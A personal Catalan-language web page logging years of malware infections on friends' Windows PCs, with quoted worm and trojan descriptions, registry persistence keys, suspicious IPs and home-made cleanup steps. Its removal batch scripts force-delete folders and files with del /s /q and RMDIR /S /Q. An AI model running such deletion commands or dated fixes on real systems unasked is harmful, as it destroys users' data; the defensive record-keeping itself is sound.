|
home / virus
(navigation links)
|
The best attacks are when the code executes as the page loads,
rather than having an attacker click on a link,
so pay close attention to OnLoad() events.
|
Viruses = "verí" (llatí)
go 2 top
Consells
- mai fer servir Internet Explorer, Internet browser.
Use
Firefox,
Opera
or
Mozilla
- mai fer servir Outlook Express, Email client.
Use
Opera
or
Thunderbird
- mai fer servir el Messenger !
- fer servir un Tallafocs (Firewall), as
ZoneAlarm,
[6.1]
[6.0]
[5.5]
[5.5]
[4.5]
Atenció :
a l'apartat "Firewall", i solapa "Main",
en pulsar "Advanced", ens convé seleccionar :
- Block local servers :
prevents all programs on your computer from acting as servers
to the Trusted Zone. Note that this setting overrides
permissions granted in the Programs panel.
- Block Internet servers :
prevents all programs on your computer from acting as servers
to the Internet Zone. Note that this setting overrides
permissions granted in the Programs panel.
- fer servir un(s) vigilant(s), as
-
Fer servir la seqüència de CastleCops -
Malware Removal & Prevention [*****]
o
Secure XP [****] :
- Antivirus gratix : [* mind T42 *]
- Eines :
- Symantec says :
Run all client software as a non-privileged user with minimal access rights.
Browsing the web as a low-privileged user will limit the consequences
of malicious code being executed.
- Microsoft says :
"Running with an administrative account is dangerous to the health of your computer and your data."
El meu resum per en Cirx (20200604)
4 consells :
- no entrar a les eines de google - mira el timeline
- no fer servir gmail sino gmx
- no fer servir Chrome sino Firefox
- fer servir mode incognit
- mai guardar les contrasenyes al navegador
- canviar les paraules de pas un cop l'any
- compte amb les aplicacions bancaries al telefon - mai deixarles obertes - cal que et demanin la contrasenya cada cop que la facis servir
Mes consells ( 2 move ! )
En Pep diu :
Jo faig servir l'avast com a antivirus, que és gratuït per a usuaris domèstics:
I com anti-spyware faig servir l'SpyBot.
|
PE_NIMDA.A-O
This is a fast-spreading Internet worm and file infector
in pure and original form.
It arrives as an embedded attachment, README.EXE file,
in an email that has an empty message body and,
usually, an empty subject field.
It does not require the email receiver to open the attachment for it to execute.
It uses a known vulnerability in Internet Explorer-based email clients
to execute the file attachment automatically.
This is also known as Automatic Execution of Embedded MIME type.
The infected email contains the executable attachment registered
as content-type of audio/x-wav so that when recipients view the infected email,
the default application associated with audio files is opened.
This is usually the Windows Media Player.
The embedded EXE file cannot be viewed in Microsoft Outlook.
Few dangerous pages
- 1
- 2
- 3
- 4
- 5
- Korea
-
- Deb
- ee*.exe
- JavaScript + IE + infected
.eml files
-
- www.cerials.net instala,
sota c:\Windows\Application Data",
el fitxer EEVBHECK.EXE.
Also, something was added to
HKLM -> Software -> Microsoft -> Windows -> Current Version -> Run
També si vas a
Cracks
-
Kliccami :
tot enllaç instala dial_243_IT.exe !!!
|
Març 2003 : en Jordi té un virus
Els síntomes son :
- Nero diu "EXE has been modified" i no arrenca
- IE canvia de camps molt poc a poc
- no pot instalar Anti-Virus
Ha rebut un missatge dient que enviaba correus amb el virus
w32.klez@mm
Veure
qui es
Setembre 2004 : en Jordi té el Sasser
From
here :
Microsoft Windows contains a vulnerability that can allow an attacker to execute arbitrary code.
The vulnerability is due to a lack of bounds checking on messages
submitted to the Local Security Authority Subsystem Service (LSASS) service.
An attacker can supply a long argument using the LSASRV.DLL function DsRoleUpgradeDownlevelServer()
to create a carefully constructed message and cause an overflow,
which can result in arbitrary code execution.
Keyword(s): Sasser, Cycle, Korgo, Bobax
Fix : KB 835732
from
here
(04-011)
Dec-2004 : el Sebas el té al XP ...
uSoft
says to install security update KB835732, [2.647 KB]
from
here
Removal tool [KB841720] is
here [114 KB]
En Sebas té un virus : Octubre 2003
Amb la conexió commutada a Internet,
normalment es reben deu vegades mes dades que les que s'envien.
Al P4, des Octubre del 2003, vaig notar que s'enviaben mes dades
que se'n rebien. Mirant una mica millor, vaig veure que hi havia
un fluxe constant de uns 6.000 bytes per segon de sortida,
reflectits als comptadors de la icona de la conexió, sense que
jo estigués teclejant res.
Fent servir TCPview veig
( from
SysInternals, as RegMon )
+++ start of NETSTAT -AN +++
--- Protocol --- Local IP --------- Remote IP ---------- State ---
TCP 194.224.211.135:1666 194.224.75.25:135 TIME_WAIT
TCP 194.224.211.135:1708 194.224.93.5:135 TIME_WAIT
TCP 194.224.211.135:1715 194.224.93.35:135 TIME_WAIT
TCP 194.224.211.135:1716 194.224.93.36:135 TIME_WAIT
TCP 194.224.211.135:1719 194.224.94.2:135 TIME_WAIT
TCP 194.224.211.135:1720 194.224.94.5:135 TIME_WAIT
TCP 194.224.211.135:1721 194.224.94.6:135 TIME_WAIT
TCP 194.224.211.135:1723 194.224.94.17:135 TIME_WAIT
TCP 194.224.211.135:1724 194.224.94.31:135 TIME_WAIT
TCP 194.224.211.135:1726 194.224.94.37:135 TIME_WAIT
TCP 194.224.211.135:1727 194.224.94.38:135 TIME_WAIT
TCP 194.224.211.135:1728 194.224.94.39:135 TIME_WAIT
TCP 194.224.211.135:1729 194.224.94.40:135 TIME_WAIT
TCP 194.224.211.135:1730 194.224.94.41:135 TIME_WAIT
TCP 194.224.211.135:1735 194.224.94.46:135 TIME_WAIT
TCP 194.224.211.135:1736 194.224.94.47:135 TIME_WAIT
TCP 194.224.211.135:1737 194.224.94.48:135 TIME_WAIT
TCP 194.224.211.135:1738 194.224.94.49:135 TIME_WAIT
TCP 194.224.211.135:1739 194.224.94.50:135 TIME_WAIT
TCP 194.224.211.135:1740 194.224.94.51:135 TIME_WAIT
TCP 194.224.211.135:1741 194.224.94.53:135 TIME_WAIT
TCP 194.224.211.135:1742 194.224.94.54:135 TIME_WAIT
TCP 194.224.211.135:1743 194.224.94.55:135 TIME_WAIT
TCP 194.224.211.135:1744 194.224.94.56:135 TIME_WAIT
TCP 194.224.211.135:1745 194.224.94.57:135 TIME_WAIT
TCP 194.224.211.135:1746 194.224.94.58:135 TIME_WAIT
TCP 194.224.211.135:1747 194.224.94.59:135 TIME_WAIT
TCP 194.224.211.135:1883 194.224.125.14:135 TIME_WAIT
TCP 194.224.211.135:1898 194.224.126.142:135 TIME_WAIT
TCP 194.224.211.135:1964 194.224.132.41:135 TIME_WAIT
TCP 194.224.211.135:2015 194.224.135.1:135 TIME_WAIT
TCP 194.224.211.135:2017 194.224.135.3:135 SYN_SENT
TCP 194.224.211.135:2018 194.224.136.8:135 SYN_SENT
TCP 194.224.211.135:2019 194.224.136.40:135 SYN_SENT
TCP 194.224.211.135:2020 194.224.136.41:135 SYN_SENT
--- end of NETSTAT -AN ---
|
A
Google diuen que
Yes, a virus; most likely some Blaster variant.
Read Symantec about
W32.Blaster.Worm :
W32.Blaster.Worm exploits the DCOM RPC vulnerability,
as described in uS Security Bulletin MS03-026.
This worm attempts to download the MSBLAST.EXE file
to the %WinDir%\system32 directory and then execute it.
And
uSoft.
Mirant "Task Manager" abans i després es veu que apareix SVCHOST.EXE :
atiptaxx.exe
carpserv.exe
CSRSS.EXE
DLLHOST.EXE
explorer.exe
imonnt.exe
imontray.exe
internat.exe
LSASS.EXE
mstast.exe
NTVDM.EXE
regsvc.exe
SERVICES.EXE
SMSS.EXE
SMTray.exe
spoolsv.exe
svchost.exe
svchost.exe
svchost.exe
System
System Idle Process
taskmgr.exe
WINLOGON.EXE
WinMgmt.exe
WlanMonitor.exe
|
Buscant per tot el disc,
descobreixo un punt interessant :
D:\>dir svchost.exe /s
Volume in drive D is W2K
Volume Serial Number is E82F-148F
Directory of D:\WINNT\system32
06/12/1999 14:00 7.952 svchost.exe
1 File(s) 7.952 bytes
Directory of D:\WINNT\system32\dllcache
06/12/1999 14:00 7.952 svchost.exe
1 File(s) 7.952 bytes
Directory of D:\WINNT\system32\wins
03/09/2003 23:43 19.728 SVCHOST.EXE
1 File(s) 19.728 bytes
Total Files Listed:
3 File(s) 35.632 bytes
0 Dir(s) 558.993.408 bytes free
|
I el "SVCHOST.EXE" del directori "WINS" s'identifica
(mitjançant "STRINGS") com
"TCP/IP Trivial File Transfer Protocol"
El W2K WS porta (Start + Help + Index) "Network Monitor driver".
S'instala com a "Protocol" de "Microsoft".
Però ... cal un "Network Monitor"del W2K Server per veure les dades ...
"If you are running Windows'2000 Server,
you can use Network Monitor to display and analyze
the information you collect with the Network Monitor Driver."
Avui vaig a posar un FireWall :
ZoneAlarm :
zlsSetup_45_538.exe [4,8 MB]
o
zlsSetup_45_538_001.exe
o
zlsSetup_55_062_004.exe
From here :
[4,8 MB]
Thanks
Ramon Milà
De seguida m'avisa que DLLHOST.EXE es el virus
Welchia/Nachi, i efectivament tinc
\WINS\DLLHOST.EXE i \WINS\SVCHOST.EXE
La millor explicació l'he trobat
aquí.
Instala los siguientes servicios :
- RpcPatch, para ejecutar la copia del gusano (DLLHOST.EXE).
Nombre de servicio: "WINS Client"
- RpcTftpd, para ejecutar SVCHOST.EXE.
Nombre de servicio: "Network Connections Sharing"
http://www.sophos.com/support/disinfection/nachia.html says :
W32/Nachi-A relies upon two vulnerabilities in Microsoft's software.
Sophos recommends that users ensure their computers are patched against
these vulnerabilities. The two patches have been available from Microsoft
since March and July 2003 respectively.
For more information on the vulnerabilities and to download the patches
please visit Microsoft's website at the following urls:
www.microsoft.com/technet/security/bulletin/MS03-026.asp
www.microsoft.com/technet/security/bulletin/MS03-007.asp
|
Conclusió : use a Firewall !
|
En Sebas té un SpyWare : fsg_4104.exe, Novembre 2003
En
Ramón Milà
em diu que es un Gator SpyWare.
Get
SpyBot
Search & Destroy ? [3,5 MB, free]
*** do it ! ***
See
PestPatrol
elements : Key Loggers, RATs (Remote Administration Trojans),
SpyWare, Trojans, Worms, etc.
Aqui
diu
A spyware installed with common application
such as the file sharing software iMesh.
This process should be removed to ensure your personal privacy.
Here
is a Scanner + Remover
En Chicho té un Adware : msa64chk.dll, Març 2004
Best
description.
REGSVR32 /u msa64chk.dll and REGSVR32 /u msapasrc.dll + reboot
Corro el PestScan al T30 i trobo :
- ShopNav - hijacker ( c:\Program Files \srng )
- Wurldmedia - hijacker ( hkey_classes\tchk.tchkbho )
- Superbar - adware
- ShopNavSearch.Srng - hijacker
- NCase - hijacker
- Kazoom - P2P
- Gigatech Superbar - adware
- eBates MoneyMaker - adware
- DownloadWare - adware
- BDHelper - adware
- BargainBuddy - adware
- Alexa - exploit
- WindowsMedia - spyware cookie
- AtlasDMT.com - spyware cookie
Virus al T30
2004
Starting May 3-rd 2004, in Portugal but in IBMs Intranet,
my W2K crashes LSASS.EXE every 2-3 hours.
In "My PC"\HKLM\Software\Microsoft\Windows\CurrentVersion\Run comes up :
c:\winnt\system32\THLNTSESS.EXE, that requests a way to Internet (Zone Alarm says).
There was also a IIC21.EXE file in
C:\Documents and Settings\SP87026\Local Settings\Temp
See
F:\MISCOSAS\vir\2004May
Solució : install windows2000-kb835732-x86-enu.exe
T30 al 2005
09/09/2005 el T30 (sense ZoneAlarm 15 minuts) em diu
The system process c:\winnt\system32\services.exe
has terminated unexpectedly with rc=128
URL - This issue may occur if there are incorrect references to shared folders
Mark
Symantec (13/09/2005) em troba
c:\winnt\system32\FCMIXC.EXE i l'esborra.
Diu que es w32.IRCBot ...
w32.IRCBot :
When a vulnerable system is found, it uses a buffer overflow to write the worm file
to that machine via a TFTP upload on port 8594.
w32.IRCBot.B attempts to connect to the IRC server, itc.ourmoney.pp.ruz,
using TCP port 31337.
14/09/2005 el T30 (sense ZoneAlarm 15 minuts) + Symantec em troba
c:\winnt\system32\GECB.EXE i l'esborra.
Diu que es w32.SpyBot.Worm ...
21/09/2005 el T30 (sense ZoneAlarm 15 minuts) em diu
The system process c:\winnt\system32\services.exe
has terminated unexpectedly with rc=128
13/10/2005 el T30 (sense ZoneAlarm 15 minuts) repeteix "status code 128".
Crec que s'hauria de aplicar
MS05-039 ...
pero requereix SP4 !
Aquí
diu el mateix [ MS05-039 - KB899588 ]
Sembla que es el virus
Zotob
Els problemes d'en Xavi, Septembre 2004
Al Setembre 2004,
en
Xavi
es desperta amb un PC "infectat" ...
|
- Tinc un "troyano" (avisat per Telefonica) : netsky@mm
- M'ha desaparegut el IE, el Netscape
- Se m'ha instal.lat una barra d'eines de "Yaia.com" al Internet Explorer ...
HKCU/Software/Microsoft/Internet Explorer/Toolbar
Get tools listed in
www.forosdelweb.com/showthread.php?t=197669
|
Abans de formatejar el disc dur, s'ha de :
- guardar el correu rebut i enviat
- guardar les adreces de correu
- guardar els marcadors dels navegadors
- guardar les dades privades
- guardar els programes "especials" i/o les seves dades
Per exemple, les llicencies de ContaPlus o FacturaPlus i les seves dades.
- obtenir un CD (botable) del nou S.O. a instalar
- obtenir els drivers dels periferics pel nou S.O. [ADSL, printer]
Els problemes d'en Josep, Septembre 2004
Al Setembre 2004, en
Josep Montmany
diu que té un
DROPPER.DELF.DV
dins el
MSSYS.EXE
sota XP.
Al registre hi ha un NWIZ.EXE ... (???)
Probar el "SysClean" de TREND ...
URL and
ReadMe
Els problemes d'en Jordi, Desembre 2004
Al Desembre 2004, en
Jordi Espinal
em diu que la Mireia te damunt l'escriptori unes icones que
no es poden esborrar, cal no tenen "Propietats" ...
Website Hosting, Bingo, Casino Online, Printer Cartridges, Card Games, Poker, Travel
Akí diuen :
|
The Trojan may register some of the retrieved files to load at Windows
startup by adding entries into the registry such as these examples -
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
"thunkburn" = %path%\Owns This Vc.exe
HKEY_CLASSES_ROOT\CLSID\{%unique CLSID%}
"64535DBE" = 2C0411726CB7B446F792
HKEY_CLASSES_ROOT\CLSID\{%unique CLSID%}\InprocServer32\
"(Default)" = %path%\Drive bin.exe
"ThreadingModel" = Apartment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"DeleteDefySendRoad" = %path%\Thunkfilm.exe
In one "nice" aspect, at least one of the downloaded files has
an uninstall routine which can be accessed
by the "Add/Remove Software" applet from the control panel -
HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Uninstall\64 slow user\
"DisplayName" = Search Plugin
"UninstallString" = %path%\Owns This Vc.exe -uninstall
|
Caused by Messenger Plus
Solució :
http://windowsxp.mvps.org/toolbarcop.htm
or
http://lop.com/new_uninstall.exe [***]
O fer servir Start > Run > MSCONFIG
Look in the Startup tab ...
Uncheck and Restart ...
Telefonica DNS's :
80.58.0.33 and 80.58.32.97
En Sebas té TEEKIDS.EXE, Gener 2005
Jo diria que esta associat al Opera : he estat navegant molta estona
amb el Firefox, i res.
En un moment donat, obro el Opera, i s'engega el "Shutdown".
L'aturo, pero el tallafocs engantxa la sortida del teekids.exe,
que està situat a c:\windows\system32
i al registre !
VsanVirus diu :
Vulnerabilidad RPC/DCOM: MS03-026
y "filtrar con un cortafuegos los siguientes puertos : udp/135, udp/137, udp/138,
tcp/135, tcp/445, tcp/593, tcp/69, udp/69".
Per un de similar,
diu :
La falla en el componente LSASS (MS04-011),
usada también por gusanos como Sasser, Cycle, Bobax, Korgo, etc.,
permite infectar equipos con Windows XP y 2000
sin el parche correspondiente instalado, - 835732 -,
por el simple hecho de conectarse estos a Internet,
no siendo necesaria la ejecución de ningún archivo o adjunto
que involucre acción alguna por parte del usuario.
La segunda (MS03-026),
es la misma falla de la que se aprovecha el Lovsan (Blaster) y otros.
Utiliza el puerto TCP/135.
La falla se produce por un desbordamiento de búfer en la
interfase RPC (Remote Procedure Call) que permite la ejecución
arbitraria de código.
El parche existe desde julio de 2003.
( 03-039 : 824146 )
La tercera (MS03-001),
cuyo parche está disponible desde enero de 2003, - 810833 -,
es explotada a través del puerto TCP/445.
La falla ocurre en el sistema localizador RPC (Remote Procedure Call).
TEEKIDS.EXE - es el gusano
ROOT32.EXE - troyano tipo backdoor
www.microsoft.com/technet/security/bulletin/MS03-026.asp
www.microsoft.com/technet/security/bulletin/MS04-011.mspx
Feb 2007, Airis (Nicolau) : W32/MSNVB-D worm
Today, I've catched (ZoneAlarm)
ttt.exe, zap.exe, hide.exe, avconsol.exe
trying to connect to 72.14.207.95
url
Files : (hidden ?)
<Windows>\Avconsol.exe
<Windows>\Zap.exe
<System>\Hide32.exe
<System>\Ttt.exe
Registry : (HKCU!)
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Nom : WinService Contingut : <System>\Ttt.exe
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Nom : AVantivirus Contingut : <Windows>\Avconsol.exe
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Nom : System Contingut : <Windows>\Zap.exe
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Nom : Servicewin Contingut : <System>\Hide32.exe
HKCU\Software\VB and VBA Program Settings\Form1\TextBox
Mar 2007, Marta Planell : Brontok
-
Millor
descripció,
una
altra.
-
Registry keys :
-
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools := 1 ;
-
HKLM\Software\Microsoft\Windows NT\CurrentVersion\WinLogon\Shell\EKSPLORASI.exe (afegit a explorer.exe)
-
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions := 1 ;
-
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD := 0 ;
-
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden := 0 ;
-
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt := 1 ;
-
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden := 0 ;
-
HKLM\Software\Microsoft\Windows\Current Version\Run\Bron-Spizaetus\
-
c:\windows\ShellNew\sempalong.exe
-
c:\Documents and Settings\Lourdes\Configuracion Local\Datos\SMSS.exe
-
Task : <Windows>\Tasks\At1.job
-
Remove W32/Brontok using
Sophos
Nov 2007, Xavi : Trojan Mailskinner
Nov 2007, P4 : WAQ.EXE
- que es ?
- use Hijack This !
Feb 2008, Nico
-
HighJackThis : 10D4.tmp ...
Trojan.Small.ga : Cleaned with backup
-
s'intenten conectar diversos .tmp de
c:\Windows\Temp
c:\Documents and Settings\user\Local Settings\Temp
-
el WDLRSS.EXE
s'intenta conectar a 208.53.161.108,
que segons nslookup és optnation.com,
que en realitat és
http://www.unuiihee.com/remove
-
A w\s32\ hi ha amb atributs SHR :
A8659658C.SYS
WDLRSS.EXE 235.520
WRMSS.EXE 145.016
WRMSS32.EXE 141.944
-
al cap de 1/2 hora, apareixen
WMSNL.EXE 150.136 c:\windows\system32 SHR
58AD.TMP 104.960 c:\windows\temp
-
Ad-Aware diu
- Win32.Generic.Worm
- Win32.Worm.Blaster
I em troba :
c:\Program Files\Common\Yazzle14610inAdmin.exe SHR
c:\Documents and Settings\Irina\My Documents\My Received Files\myspaceimage.zip Win32.Generic.Worn
-
em surt un "Confirm File Rename" nou ... molt sospitós !
Crec que es el propi de dins "c:\windows\system32"
-
al cap de 1/2 hora, apareixen a c:\windows\temp :
E501.TMP 104.960
WUMSS32_000.tmp 90.232
que es vol conectar a 85.17.201.65
-
al registre hi trobo el llançament de WMSNL.EXE,
que es re-instala en engenar l'ordinador.
Intenta conectar-se a 72.22.71.55
-
al registre hi ha :
[EPSON Stylus Photo R280 Series]
c:\windows\system32\spool\drivers\W32X86\3\E_FATICKA.EXE /FU
"c:\windows\temp\E_S93.TMP" /EF "HKCU"
-
al registre hi ha un LSASS.EXE fals :
aquest es troba a \win\system (sense "32")
-
a la rel del disc C: hi ha ASHJE.EXE !
-
a \windows\ hi ha IMAGES.zip i IMG-0012.zip !
MATAR.CMD :
del c:\windows\system32\WMSNL.EXE
del c:\windows\system\LSASS.EXE
del c:\windows\*.zip
del c:\windows\temp\*.TMP
del c:\Documents And Settings\Arcadi\Local Settings\Temporary Internet Files\Content.IE5 *.* /s /q
del c:\Documents And Settings\Irina\Local Settings\Temporary Internet Files\Content.IE5 *.* /s /q
del c:\Documents And Settings\Nicolau\Local Settings\Temporary Internet Files\Content.IE5 *.* /s /q
del c:\Documents And Settings\Karme\Local Settings\Temporary Internet Files\Content.IE5 *.* /s /q
del c:\Documents And Settings\Sebastia\Local Settings\Temporary Internet Files\Content.IE5 *.* /s /q
Conclusió : hi havia 3 virus.
- c:\windows\temp\E_S93.tmp
- c:\windows\system\LSASS.exe
- alguna cosa més, relacionada amb el MSN Gaming Zone
Solució :
cCleaner
Trobo a
c:\windows\temp un fitxer bloquejat : ZLT022fd.TMP !
És de ZoneAlarm, vsmon.exe ...
Al engegar, un CMD line fa quelcom ... (2 finestres)
Persegueixo el virus amb el Filemon dins el Startup.
Vull saber qui escriu el fitxer a c:\windows\temp !
Després de que NAV ni Gmail es queixessin dels fitxers A1FF.TMP,
he instalat KAV 7.0.1.325 i, curiosament, em demana de treure Zone Alarm !
De seguida troba el troyano CRYPTS.DLL, i l'esborra.
I màgicament desapareix
un WinLogon que escoltava a 127.0.0.1:1025 (TCPview).
REGMON.LOG, line 5613150: regedit.exe:3484 QueryValue
HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\Notify\crypt\DLLName SUCCESS "crypts.dll"
Drops the following files in the Windows directory:
scins.exe, winserv.exe, fierms.exe, and madopew.dll.
url
* %WINDIR%\SYSTEM32\crypts.dll (29,696 bytes)
The files are internally compressed with UPX packer.
The downloader uses Winlogon notification packages
as registered DLLs that the Winlogon process loads at startup.
url
Explicació del mecanisme :
Winlogon Notification Packages
The filename CRYPTS.DLL was first seen on Sep 13 2007 in SPAIN.
The unsafe files using this name
are associated with the malware group TROJAN.SOBAR
Added as a Winlogon Notification DLL to automatically load on system start up.
url
Troj/Agent-GJR Trojan
url
20080223 : Kaspersky segueix treballant :
- c:\01-29.exe = Trojan-Clicker.Win32.Agent
- c:\16.exe = virus Heur.Invader
- c:\abbjah.exe = Backdoor.Win32.SdBot.cud
- c:\ashje.exe = virus Heur.Backdoor.Generic
- c:\sk.exe = Backdoor.Win32.Agent.ekc
- c:\updateu23.exe = Backdoor.IRCBoot.blq
- c:\windows\system32\crypts.dll//PE_Patch.UPX//UPX
- c:\windows\Avconsol.exe//PE_patch.UPX//UPX
- c:\windows\images.zip/IMG34814.pif
- c:\windows\IMG-0012.zip/img0012-www.photostorage.com
- c:\windows\winset99.dll
- c:\windows\winsys99.dll
- c:\windows\Zap.exe//PE_Patch.UPX//UPX
- c:\windows\system32\Hide32.exe//PE_Patch.UPX//UPX
- c:\windows\system32\TeeKids.exe
- c:\windows\system32\TTT.exe//PE_Patch.UPX//UPX
- c:\windows\system32\WAQ.exe
- c:\windows\system32\wdllrss.exe//PE_Patch//NTKml
- c:\windows\system32\wmsnl.exe
- c:\windows\system32\wrmss.exe
- c:\windows\system32\wrmss32.exe
- c:\windows\system32\wumss.exe
- c:\Documents and Settings\Nicolau.PX4\application data\WINUP39.DLL
- c:\Documents and Settings\Nicolau.PX4\application data\WINNT63.DLL
- c:\Documents and Settings\Arcadi\Local Settings\Temp\wintool99.dll
- c:\Documents and Settings\Arcadi\Temporary Internet Files\wincsv5.dll
- c:\Documents and Settings\Irina\Application Data\WINNT99.DLL
- c:\Documents and Settings\Irina\Local Settings\Temp\eraseme_55141.exe
- c:\Documents and Settings\Irina\Local Settings\Temp\WINDSK99.DLL
- c:\Documents and Settings\Irina\Local Settings\Temp\Temporary Internet Files\Content.IE5\0LM341UR\u2_3[1].jpg
- c:\Documents and Settings\Irina\Local Settings\Temp\Temporary Internet Files\Content.IE5\2LMWL1WL\f2be97aebb[1].jpg
- c:\Documents and Settings\Irina\Local Settings\Temp\Temporary Internet Files\WINCSV99.DLL
- c:\Documents and Settings\Irina\My Documents\My Received Files\IMG-0012.zi\img0012-www.photostorege.com
- c:\Documents and Settings\Irina\My Documents\My Received Files\myspaceimage.zi\image_519.jpeg-irina_altemir@hotmail.com
- c:\Documents and Settings\Carme\Application Data\WINNT99.DLL
Maig 2008, P4
Solució : posar AVG.
Se'm menja la conexió a Internet
conectant el Explorer a
66.186.63.188:7000 = "CUSTOMER.VPLS.NET"
El trec.
Lista de troyanos por puerto:
port 7000 Exploit Translation Server, Kazimas, Remote Grab, SubSeven, SubSeven 2.1 Gold
Ccleaner, en engegar, també vol anar a 66.186.63.188 ...
Solució : posar Avast.
Ara el Microchoft Explorer es vol conectar a
67.198.204.18:1863 = "CUSTOMER.VPLS.NET"
El filtro amb el ZoneAlarm.
sfc /scannow = verify that all protected files are intact
ShellExView = identifica dll's y procesos que corren en el shell (explorer.exe)
(remote, net scan)
Symantec 9.0.5.1000, ki := 'symantec' !
El explorer.exe peta amb el missatge
"setting up personalized settings for c:\recyclers\"
Al disc "D:\" hi ha
D:\RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013
i a dintre hi ha ISE32.exe de 14.336 bytes !
Solució :
URL
@echo off
title Malware Removal Tool ;) - By Smartgenius
color 0a
taskkill /f /im explorer.exe
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL /v CheckedValue /t REG_DWORD /d 1 /f
ping -n 2 0.0.0.0 > nul
c:
cd c:\
attrib -r -s -h
RMDIR /S /Q RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013
del /f %windir%\Prefetch\ISE32.EXE-34CFE4CB.pf
del /f %windir%\Prefetch\ISE32.EXE-273EA8B7.pf
del /f %windir%\Prefetch\ISEE.EXE-05DD3401.pf
D:
cd d:\
attrib -r -s -h
del /f autorun.inf
RMDIR /S /Q RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013
explorer
msg /w * Gracias por usar este soft
exit
Cheers, SmartGenius !
Abril 2009, CMI has TWEXT.exe
Follow these steps :
- Deshabilitar restauración del sistema
Windows XP
- En el panel de Inicio pulse sobre "Mi PC"
- Haga clic en "Ver información del sistema"
- Seleccione la etiqueta "Restaurar sistema"
- Marque la casilla "Desactivar Restaurar sistema en todas las unidades" y pulse en "Aplicar".
- El sistema le preguntará si está seguro de querer deshabilitarlo.
Confírmelo pulsando en SÍ.
- La opción que muestra el estado de los discos en la ventana "Configuración de la unidad"
aparecerá deshabilitada (todo gris). Pulse en el botón Aceptar.
- Reinicie su ordenador en Modo Seguro o Modo a Prueba de Fallos.
Windows Vista/XP/2000.
Presione la tecla F8 después de los mensajes de autodiagnóstico (POST) de la placa base.
Dependiendo de la configuración puede que aparezca el mensaje "presione F8 para menú de inicio"
durante una pausa de 2 segundos.
En caso contrario, presione F8 repetidadmente mientras arranca el PC
hasta que aparezca el menú de inicio,
y elija "Modo seguro" o "Modo a prueba de fallos".
- borrar c:\windows\system32\twext.exe
url
Use autoruns.exe.
Desembre 2009, TCS has A0060612.exeT.exe
- Eliminar puntos de restauracion
- Propietats del sistema + Restaurar el sistema + quitar
- pasar AVG de nuevo
- Poner "Restaurar sistema de nuevo"
- quitar hiberfil.sys
- Click en Inicio > Panel de Control
- Doble click en Opciones de Energia
- Click en la pestaña Hibernacion, desmarca la casilla de seleccion de "Habilitar hibernacion" y click en Aplicar, luego Aceptar.
- Ahora reinicia el computador, o antes, el archivo será automaticamente eliminado
- Finalizar el proceso del explorador (explorer.exe):
- Eliminar carpeta en "c:\Recycler"
- Limpiar registro
taskkill /f /im explorer.exe
attrib -h -r -s S-1-5-21-1482476501-1644491937-682003330-1013
del S-1-5-21-1482476501-1644491937-682003330-1013
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{08B0E5C0-4FCB-11CF-AAX5-90401C608512}\
StubPath = "C:RECYCLERS-1-5-21-1482476501-1644491937-682003330-1013ise.exe"
Novembre 2010, Nicolau has cleansweep.exe
Double accent virus (Notepad, Firefox) :
h:\cleansweep.exe\cleansweep.exe
Març 2011, TCS@Dipu has PINK SLIP BOT
Pending to investigate ...
Març 2011, SAG T400 goes Stand By
Installing all updates ...
"Updates could not be installed" :
c:\WINDOWS\system32\CatRoot2\edb.log -> delete EDB.LOG and/or rename CatRoot2 folder.
c:\windows\Windowsupdate.log ;
Març 2011, K#1
W32.downadup
VKPN[1].JPG @ c:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files
c:\windows\system32\X
Solució : MS08-067 = KB958644 ;
Abril 2012, Angel te un Ukash
El archivo malware se llama mahmud.exe y se instala en
C:\Documents and Settings\Nombre de usuario\AppData\Roaming\
Regedit : locate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Find the registry key named Shell.
Should be something like C:\Documents and Settings\username\desktop\VIRUS INFO.exe,
located after "Explorer.exe"
En engegar la maquina, un RUNDLL32 activa
c:\Documents and Settings\RAFI\Local Settings\temp\WPBT0.DLL
Maig 2012, Lourdes i net.exe
Symptoms:
- msiexec.exe started 2 times every minute
- net.exe started 4 times every minute
- net.exe wants to stop Norton Ghost service
Solucio :
- HijackThis
- un-install Norton Ghost
- use MalwareBytes
Uninstall Norton Ghost with the Norton Removal Tool.
- Double click your Malwarebytes desktop icon
- Click the UPDATE tab at the top
- Scan for and install any updates it finds
- Then choose the SCANNER tab and run a QUICK SCAN
- Once finished if MBAM found anything please click Show Results
- Make sure EVERYTHING has a check in the box next to it and then click Remove Selected
- Post the MBAM log results back to this thread
RV has Google Redirect (20120213)
- c:\windows\system32\drivers\atapi.sys :
Hitman pro 3.5
-
c:\WINDOWS\system32\drivers\etc\hosts file
CMI has "Trojan.ADH.2" (20141019)
Could not open this
URL
MRJ has "gogorithm" (20141021)
CMI te "Crypto Locker" (20150315)
Fitxers amb extensio ".encrypted" i instruccions de pagament.
Comprar using TOR
Lourdes te "Deal4Real" i/o "Lucky Shopper" (20150407)
Els enllaços son verds i inclou texte propi abans dels resultats de Google.
Reinstalo Firefox i Chrome.
Lourdes te "OnlineLowDeals" (20150507)
guide
Uri i Esther, Novembre de 2015
- Uri te un "Ad" - reinstalem Chrome tot i que funciona OK en mode incognit
- Esther te
- Ad - remove all extensions erasing the folder
- KM.exe - detected and removed by Windows Defender
Install
AdBlock (chrome),
Click & Clean,
and
